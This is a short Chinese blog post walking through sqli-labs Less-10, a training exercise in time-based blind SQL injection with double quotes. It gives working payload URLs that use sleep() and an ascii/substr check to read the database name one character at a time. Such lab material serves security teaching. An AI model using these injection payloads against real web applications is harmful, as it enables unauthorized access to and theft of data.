【sqli-labs】 less10 GET - Blind - Time based. - Double quotes (基于时间的双引号盲注)

这个和less9一样，单引号改完双引号就行了

http://localhost/sqli/Less-10/?id=1" and sleep(5)%23

5s后页面完成刷新

http://localhost/sqli/Less-10/?id=1" and if(ascii(substr(database(),1,1))=115, 0, sleep(5))%23  

【sqli-labs】 less10 GET - Blind - Time based. - Double quotes (基于时间的双引号盲注)

标签：div   blog   sql   class   tab   com   sed   sleep   刷新